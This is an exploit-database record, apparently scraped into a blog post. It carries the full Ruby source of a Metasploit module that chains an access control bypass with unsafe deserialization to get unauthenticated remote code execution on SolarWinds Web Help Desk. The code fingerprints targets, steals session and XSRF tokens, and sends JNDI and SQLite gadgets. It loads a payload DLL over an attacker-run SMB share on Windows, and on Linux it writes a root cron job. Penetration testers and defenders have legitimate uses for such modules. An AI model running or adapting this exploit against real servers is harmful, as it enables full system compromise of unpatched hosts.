{“lastseen”:”2026-02-13T19:28:03″,”description”:”This module exploits an access control bypass vulnerability CVE-2025-40536 and an unsafe deserialization vulnerability CVE-2025-40551 to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk WHD server. Module Options msf use…”,”published”:”2026-02-13T18:59:17″,”modified”:”2026-02-13T18:59:17″,”type”:”metasploit”,”title”:”SolarWinds Web Help Desk unauthenticated RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-40536″,”CVE-2025-40551″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = GreatRanking\\n\\n include Msf::Exploit::Remote::JndiInjection\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::EXE\\n include Msf::Exploit::Retry\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘SolarWinds Web Help Desk unauthenticated RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an access control bypass vulnerability (CVE-2025-40536) and an unsafe deserialization\\n vulnerability (CVE-2025-40551) to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk (WHD)\\n server.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Jimi Sebree’, # Original finder @ horizon3.ai\\n ‘sfewer-r7’ # MSF module (Based on the Nuclei template by horizon3.ai)\\n ],\\n ‘References’ =\\u003e [\\n # Access control bypass vulnerability\\n [‘CVE’, ‘2025-40536’],\\n # Unsafe deserialization for RCE\\n [‘CVE’, ‘2025-40551’],\\n # Vendor advisory\\n [‘URL’, ‘https:\/\/documentation.solarwinds.com\/en\/success_center\/whd\/content\/release_notes\/whd_2026-1_release_notes.htm’],\\n # Technical analysis from horizon3.ai\\n [‘URL’, ‘https:\/\/horizon3.ai\/attack-research\/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue\/’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-01-28’,\\n ‘Privileged’ =\\u003e true, # Runs as \\”NT AUTHORITY\\\\SYSTEM\\” by default on a Windows install.\\n ‘Platform’ =\\u003e [‘win’, ‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_X64, ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘WHD 12.8.* on Windows (Native code payload)’, {\\n ‘VersionStart’ =\\u003e ‘12.8’,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_X64 # Ships as a Java application running in a x64 java.exe process\\n }\\n ],\\n [\\n ‘WHD 12.8.* on Linux (Command payload)’, {\\n ‘VersionStart’ =\\u003e ‘12.8’,\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\\\”\\n },\\n ‘WfsDelay’ =\\u003e 90 # cron can take ~1 minute\\n }\\n ],\\n [\\n ‘WHD 12.7.* on Windows (Command payload)’, {\\n ‘VersionStart’ =\\u003e ‘12.7’,\\n ‘GadgetChain’ =\\u003e ‘CommonsBeanutils1’,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD\\n }\\n ],\\n [\\n ‘WHD 12.7.* on Linux (Command payload)’, {\\n ‘VersionStart’ =\\u003e ‘12.7’,\\n ‘GadgetChain’ =\\u003e ‘CommonsBeanutils1’, # Tested against Web Help Desk version 12.7.11.1182 (linux)\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD\\n }\\n ],\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 8443,\\n ‘SSL’ =\\u003e true\\n },\\n ‘Notes’ =\\u003e {\\n # For the 12.8.* target on Windows, the service may crash and restart so we use a stability of\\n # CRASH_SERVICE_RESTARTS, but for all the other targets the stability is CRASH_SAFE.\\n ‘Stability’ =\\u003e [CRASH_SERVICE_RESTARTS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS] # C:\\\\Program Files\\\\WebHelpDesk\\\\log\\\\whd.log\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’])\\n ])\\n end\\n\\n def check\\n session_ctx = step1_initial_session\\n\\n CheckCode::Vulnerable(\\”Detected Web Help Desk version #{session_ctx[:version]} (#{session_ctx[:platform]}).\\”)\\n rescue Msf::Exploit::Failed =\\u003e e\\n CheckCode::Unknown(e.to_s)\\n end\\n\\n def exploit\\n print_status(‘Step 1 – Initial session…’)\\n\\n session_ctx = step1_initial_session\\n\\n # Verify the remote target matches the expectations for the Metasploit target’s version and platform…\\n\\n fail_with(Failure::BadConfig, \\”Remote target is running version #{session_ctx[:version]}, current Metasploit target gadget chain is for version #{target[‘VersionStart’]}.*. Set a different target.\\”) unless session_ctx[:version].start_with? target[‘VersionStart’]\\n\\n case target[‘Platform’]\\n when ‘win’\\n fail_with(Failure::BadConfig, \\”Remote target is running on #{session_ctx[:platform]} but Metasploit target platform is #{target[‘Platform’]}. Set a different target.\\”) unless session_ctx[:platform] == :windows\\n when [‘unix’, ‘linux’]\\n fail_with(Failure::BadConfig, \\”Remote target is running on #{session_ctx[:platform]} but Metasploit target platform is #{target[‘Platform’]}. Set a different target.\\”) unless session_ctx[:platform] == :linux\\n else\\n fail_with(Failure::BadConfig, \\”Unexpected target platform #{target[‘Platform’]}. Set a different target.\\”)\\n end\\n\\n session_ctx[:service] = get_target_service(session_ctx)\\n\\n print_status(‘Step 2 – Login pref page…’)\\n\\n external_auth_container = step2_login_pref_page(session_ctx)\\n\\n print_status(‘Step 3 – Trigger SAML object…’)\\n\\n step3_trigger_saml_object(session_ctx, external_auth_container)\\n\\n print_status(‘Step 4 – Create JSON RPC bridge…’)\\n\\n jsonrpc_client = step4_create_jsonrpc_bridge(session_ctx)\\n\\n print_status(‘Step 5 – Unsafe deserialization…’)\\n\\n get_target_gadgets(session_ctx).each do |gadget|\\n print_status(\\” Executing gadget – #{gadget[:title]}\\”)\\n\\n step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, gadget[:json_data], return_early: true)\\n\\n Rex::ThreadSafe.sleep(2)\\n end\\n\\n # block untill we get a session, so we dont tear down the SMB\/LDAP service prematurly.\\n retry_until_truthy(timeout: datastore[‘WfsDelay’]) do\\n !handler_enabled? || session_created?\\n end\\n\\n unless session_ctx[:service].nil?\\n session_ctx[:service].cleanup\\n end\\n\\n handler\\n ensure\\n cleanup_service\\n end\\n\\n class SimpleSMBShareWrapper \\u003c ::Msf::Exploit\\n include ::Msf::Exploit::Remote::SMB::Server::Share\\n end\\n\\n def get_target_service(session_ctx)\\n if target[‘VersionStart’] == ‘12.7’\\n start_service\\n return nil\\n end\\n\\n # For 12.8.* targets on Windows, our gadget will force a native code library (a DLL) to be loaded from a UNC path\\n # over SMB. We need to spin up an SMB server with a share to satisfy this. As we already\\n # include Msf::Exploit::Remote::JndiInjection we cannot also include Msf::Exploit::Remote::SMB::Server::Share. To\\n # overcome this, we wrap the SMB server mixin in a new Exploit class, and instantiate it separately.\\n return nil unless target[‘VersionStart’] == ‘12.8’ \\u0026\\u0026 session_ctx[:platform] == :windows\\n\\n if Rex::Socket.is_ip_addr?(datastore[‘SRVHOST’]) \\u0026\\u0026 Rex::Socket.addr_atoi(datastore[‘SRVHOST’]) == 0\\n fail_with(Exploit::Failure::BadConfig, ‘The SRVHOST option must be set to a routable IP address.’)\\n end\\n\\n # NOTE: It has to be TCP port 445 for SMB, so we don’t expose this port number to the user as an option.\\n print_status(\\”Serving a malicious extension over an SMB share on #{datastore[‘SRVHOST’]} (SMB on TCP port 445)\\”)\\n\\n smb_service = SimpleSMBShareWrapper.new\\n\\n smb_service.datastore[‘SRVPORT’] = 445\\n smb_service.datastore[‘SRVHOST’] = datastore[‘SRVHOST’]\\n\\n smb_service.setup\\n\\n smb_service.file_contents = generate_payload_dll\\n\\n smb_service.file_name += ‘.dll’\\n\\n smb_service.start_service({\\n ‘ServerPort’ =\\u003e 445,\\n ‘ServerHost’ =\\u003e datastore[‘SRVHOST’]\\n })\\n\\n smb_service\\n end\\n\\n def get_target_gadgets(session_ctx)\\n gadgets = []\\n\\n if target[‘VersionStart’] == ‘12.7’\\n # Tested against Web Help Desk version 12.7.11.1182 running on Linux.\\n\\n print_status(\\”Malicious JNDI URL: #{jndi_string}\\”)\\n\\n gadgets.push({\\n title: ‘Malicious JNDI lookup via ch.qos.logback.core.db.JNDIConnectionSource’,\\n json_data: {\\n ‘javaClass’ =\\u003e ‘ch.qos.logback.core.db.JNDIConnectionSource’, # logback-core.jar\\n ‘jndiLocation’ =\\u003e jndi_string\\n }\\n })\\n elsif target[‘VersionStart’] == ‘12.8’\\n # We first need to register the org.sqlite.JDBC driver so we can use it, as it may have not already\\n # been registered. By instantiating org.sqlite.JDBC, the classes static initializer will register the driver.\\n gadgets.push({\\n title: ‘Registering the org.sqlite.JDBC driver’,\\n json_data: {\\n ‘javaClass’ =\\u003e ‘org.sqlite.JDBC’\\n }\\n })\\n\\n if session_ctx[:platform] == :windows\\n print_status(\\”Malicious SQLite extension UNC: #{session_ctx[:service].unc}\\”)\\n\\n # With the org.sqlite.JDBC driver available, we leverage com.zaxxer.hikari.HikariDataSource to create a sqlite\\n # connection. We use a sqlite in-memory database to avoid touching disk, and we leverage the enable_load_extension\\n # pragma to allow us to load arbitrary native code extensions. Hikari allows us to execute arbitrary SQL statement\\n # when a new database connection is opened. We use this to load a malicious extension that contains a Metasploit\\n # native code payload.\\n #\\n # Tested against Web Help Desk version 12.8.8.2528 running on Windows Server 2022 (NOTE: If you are using\\n # the default Metasploit payloads you will have to disable Defender while testing, alternatively bring your\\n # own payloads).\\n gadgets.push({\\n title: ‘Loading malicious extension over SMB’,\\n json_data: {\\n ‘javaClass’ =\\u003e ‘com.zaxxer.hikari.HikariDataSource’,\\n ‘driverClassName’ =\\u003e ‘org.sqlite.SQLiteDataSource’,\\n ‘jdbcUrl’ =\\u003e ‘jdbc:sqlite::memory:?enable_load_extension=true’,\\n ‘connectionInitSql’ =\\u003e \\”SELECT load_extension(‘#{session_ctx[:service].unc}’);\\”\\n }\\n })\\n elsif session_ctx[:platform] == :linux\\n # Leveraging a dirty file write viw SQLite to a cronjob has been shown to work against some cron daemons:\\n # https:\/\/kiddo-pwn.github.io\/blog\/2025-11-30\/writing-sync-popping-cron\\n # However when testing against an Ubuntu system, I get the syslog error:\\n # cron[427]: Error: bad minute; while reading \/etc\/cron.d\/hax_5\\n #\\n random_name = Rex::Text.rand_text_alpha(8)\\n\\n gadgets.push({\\n title: \\”Creating file in \/etc\/cron.d\/#{random_name}\\”,\\n json_data: {\\n ‘javaClass’ =\\u003e ‘com.zaxxer.hikari.HikariDataSource’,\\n ‘driverClassName’ =\\u003e ‘org.sqlite.SQLiteDataSource’,\\n ‘jdbcUrl’ =\\u003e \\”jdbc:sqlite:\/etc\/cron.d\/#{random_name}\\”,\\n ‘connectionInitSql’ =\\u003e ‘CREATE TABLE a (b TEXT UNIQUE);’\\n }\\n })\\n\\n gadgets.push({\\n title: \\”Dirty file write to \/etc\/cron.d\/#{random_name}\\”,\\n json_data: {\\n ‘javaClass’ =\\u003e ‘com.zaxxer.hikari.HikariDataSource’,\\n ‘driverClassName’ =\\u003e ‘org.sqlite.SQLiteDataSource’,\\n ‘jdbcUrl’ =\\u003e \\”jdbc:sqlite:\/etc\/cron.d\/#{random_name}\\”,\\n ‘connectionInitSql’ =\\u003e \\”INSERT OR IGNORE INTO a (b) VALUES (‘\\\\n* * * * * root #{payload.encoded}\\\\n’);\\”\\n }\\n })\\n end\\n else\\n fail_with(Failure::BadConfig, \\”Unexpected target version #{target[‘VersionStart’]}. Set a different target.\\”)\\n end\\n end\\n\\n # By default, Metasploit will use BeanFactory, but we want CommonsBeanutils1. The gadget chain used here is left\\n # as a target option so we can add new targets (i.e. specific versions of WHD) with ease.\\n def build_ldap_search_response_payload\\n build_ldap_search_response_payload_inline(target[‘GadgetChain’])\\n end\\n\\n def step1_initial_session\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘helpdesk’, ‘WebObjects’, ‘Helpdesk.woa’),\\n ‘headers’ =\\u003e {\\n ‘x-webobjects-recording’ =\\u003e ‘1’\\n }\\n )\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 1 – Connection failed’) unless res\\n\\n fail_with(Failure::UnexpectedReply, \\”Step 1 – Unexpected response code #{res.code}\\”) unless res.code == 200\\n\\n m = res.body.match(%r{\\”\/helpdesk\/\\\\w+\/\\\\w+\\\\.css\\\\?v=([\\\\d_]+)\\”})\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 1 – Failed to extract version’) unless m\\n\\n version = m[1].gsub(‘_’, ‘.’)\\n\\n vprint_status(\\”Version: #{version}\\”)\\n\\n m = res.body.match(%r{src=\\”\/helpdesk\/WebObjects\/Helpdesk\\\\.woa\/wr\\\\?wodata=(jar[^\\”]+)\\”})\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 1 – Failed to extract resource path’) unless m\\n\\n resource_path = Rex::Text.uri_decode(m[1])\\n\\n # jar:file:\/\/\/\/C:\/Program%20Files\/WebHelpDesk\/bin\/webapps\/helpdesk\/WEB-INF\/lib\/Ajax.jar!\/WebServerResources\/prototype.js\\n # jar:file:\/\/\/usr\/local\/webhelpdesk\/bin\/webapps\/helpdesk\/WEB-INF\/lib\/Ajax.jar!\/WebServerResources\/prototype.js\\n platform = if resource_path =~ %r{file:\/\/\/\/.:\/}\\n :windows\\n else\\n resource_path =~ %r{file:\/\/\/Applications\/} ? :mac : :linux\\n end\\n\\n vprint_status(\\”Platform: #{platform}\\”)\\n\\n cookies = res.get_cookies\\n\\n jsessionid = cookies.scan(\/JSESSIONID=([A-Za-z0-9]+);*\/).flatten[0] || nil\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 1 – Failed to get JSESSIONID’) unless jsessionid\\n\\n vprint_status(\\”JSESSIONID: #{jsessionid}\\”)\\n\\n xsrf_token = cookies.scan(\/XSRF-TOKEN=([A-Za-z0-9-]+);*\/).flatten[0] || nil\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 1 – Failed to get XSRF-TOKEN’) unless xsrf_token\\n\\n vprint_status(\\”XSRF-TOKEN: #{xsrf_token}\\”)\\n\\n x_webobjects_session_id = res.headers[‘x-webobjects-session-id’]\\u0026.to_s\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 1 – Failed to get x-webobjects-session-id’) unless x_webobjects_session_id\\n\\n vprint_status(\\”x-webobjects-session-id: #{x_webobjects_session_id}\\”)\\n\\n {\\n version: version,\\n platform: platform,\\n jsessionid: jsessionid,\\n xsrf_token: xsrf_token,\\n x_webobjects_session_id: x_webobjects_session_id\\n }\\n end\\n\\n def step2_login_pref_page(session_ctx)\\n res = send_request_cgi(\\n ‘method’ =\\u003e session_ctx[:version].start_with?(‘12.8’) ? ‘GET’ : ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘helpdesk’, ‘WebObjects’, ‘Helpdesk.woa’, ‘wo’, \\”#{Rex::Text.rand_text_alpha(8)}.wo\\”, session_ctx[:x_webobjects_session_id], ‘1.0’),\\n ‘headers’ =\\u003e {\\n ‘X-Xsrf-Token’ =\\u003e session_ctx[:xsrf_token],\\n ‘Cookie’ =\\u003e \\”JSESSIONID=#{session_ctx[:jsessionid]}\\”\\n },\\n ‘vars_get’ =\\u003e {\\n Rex::Text.rand_text_alpha(8) =\\u003e ‘\/ajax\/’,\\n ‘wopage’ =\\u003e ‘LoginPref’\\n }\\n )\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 2 – Connection failed’) unless res\\n\\n fail_with(Failure::UnexpectedReply, \\”Step 2 – Unexpected response code #{res.code}\\”) unless res.code == 200\\n\\n m = res.body.match(%r{id=\\”externalAuthContainer\\” updateUrl=\\”\/(helpdesk\/WebObjects\/Helpdesk\\\\.woa\/ajax\/\\\\d+\\\\.\\\\d+)})\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 2 – Failed to extract externalAuthContainer’) unless m\\n\\n external_auth_container = m[1]\\n\\n vprint_status(\\”externalAuthContainer: #{external_auth_container}\\”)\\n\\n external_auth_container\\n end\\n\\n def step3_trigger_saml_object(session_ctx, external_auth_container)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, external_auth_container),\\n ‘headers’ =\\u003e {\\n ‘X-Xsrf-Token’ =\\u003e session_ctx[:xsrf_token],\\n ‘Cookie’ =\\u003e \\”JSESSIONID=#{session_ctx[:jsessionid]}\\”\\n },\\n ‘data’ =\\u003e \\”0.7.1.3.1.0.0.0.1.1.0=1\\u0026_csrf=#{session_ctx[:xsrf_token]}\\”\\n )\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 3 – Connection failed’) unless res\\n\\n fail_with(Failure::UnexpectedReply, \\”Step 3 – Unexpected response code #{res.code}\\”) unless res.code == 200\\n end\\n\\n def step4_create_jsonrpc_bridge(session_ctx)\\n res = send_request_cgi(\\n ‘method’ =\\u003e session_ctx[:version].start_with?(‘12.8’) ? ‘GET’ : ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘helpdesk’, ‘WebObjects’, ‘Helpdesk.woa’, ‘wo’, \\”#{Rex::Text.rand_text_alpha(8)}.wo\\”, session_ctx[:x_webobjects_session_id], ‘1.0’),\\n ‘headers’ =\\u003e {\\n ‘X-Xsrf-Token’ =\\u003e session_ctx[:xsrf_token],\\n ‘Cookie’ =\\u003e \\”JSESSIONID=#{session_ctx[:jsessionid]}\\”\\n },\\n ‘vars_get’ =\\u003e {\\n Rex::Text.rand_text_alpha(8) =\\u003e ‘\/ajax\/’,\\n ‘wopage’ =\\u003e ‘LoginPref’\\n }\\n )\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 4 – Connection failed’) unless res\\n\\n fail_with(Failure::UnexpectedReply, \\”Step 4 – Unexpected response code #{res.code}\\”) unless res.code == 200\\n\\n m = res.body.match(%r{JSONRpcClient\\\\(‘\/helpdesk\/WebObjects\/Helpdesk\\\\.woa\/ajax\/([\\\\d.]+)’\\\\);})\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 4 – Failed to extract JSONRpcClient’) unless m\\n\\n jsonrpc_client = m[1]\\n\\n vprint_status(\\”JSONRpcClient: #{jsonrpc_client}\\”)\\n\\n jsonrpc_client\\n end\\n\\n def step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, json_data, return_early: false)\\n random_id = rand(1..0xffff)\\n random_name = Rex::Text.rand_text_alpha(8)\\n\\n # whd-core.jar!com.macsdesign.util.MDSApplication.isWhitelisted\\n allowlist = [\\n ‘parentpopup’, ‘wonoselectionstring’, ‘dummy’, ‘mdssubmitlink’, ‘mdsform__enterkeypressed’,\\n ‘mdsform__shiftkeypressed’, ‘mdsform__altkeypressed’, ‘_csrf’\\n ]\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘helpdesk’, ‘WebObjects’, ‘Helpdesk.woa’, ‘wo’, jsonrpc_client),\\n ‘headers’ =\\u003e {\\n ‘X-Xsrf-Token’ =\\u003e session_ctx[:xsrf_token],\\n ‘Cookie’ =\\u003e \\”JSESSIONID=#{session_ctx[:jsessionid]}\\”\\n },\\n ‘data’ =\\u003e {\\n Rex::Text.rand_text_alpha(8) =\\u003e \\”java.#{allowlist.shuffle.join}\\”,\\n ‘id’ =\\u003e random_id,\\n ‘method’ =\\u003e ‘wopage.setVariableValueForName’,\\n ‘params’ =\\u003e [\\n random_name,\\n json_data\\n ]\\n }.to_json\\n )\\n\\n fail_with(Failure::UnexpectedReply, ‘Step 5A – Connection failed’) unless res\\n\\n fail_with(Failure::UnexpectedReply, \\”Step 5A – Unexpected response code #{res.code}\\”) unless res.code == 200\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘helpdesk’, ‘WebObjects’, ‘Helpdesk.woa’, ‘wo’, jsonrpc_client),\\n ‘headers’ =\\u003e {\\n ‘X-Xsrf-Token’ =\\u003e session_ctx[:xsrf_token],\\n ‘Cookie’ =\\u003e \\”JSESSIONID=#{session_ctx[:jsessionid]}\\”\\n },\\n ‘data’ =\\u003e {\\n Rex::Text.rand_text_alpha(8) =\\u003e \\”java.#{allowlist.shuffle.join}\\”,\\n ‘id’ =\\u003e random_id,\\n ‘method’ =\\u003e ‘wopage.variableValueForName’,\\n ‘params’ =\\u003e [random_name]\\n }.to_json\\n )\\n\\n unless return_early\\n fail_with(Failure::UnexpectedReply, ‘Step 5B – Connection failed’) unless res\\n\\n fail_with(Failure::UnexpectedReply, \\”Step 5B – Unexpected response code #{res.code}\\”) unless res.code == 200\\n end\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/solarwinds_webhelpdesk_rce.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/solarwinds_webhelpdesk_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-13T19:28:03″,”description”:”This module exploits an access control bypass vulnerability CVE-2025-40536 and an unsafe deserialization vulnerability CVE-2025-40551 to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-40805","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n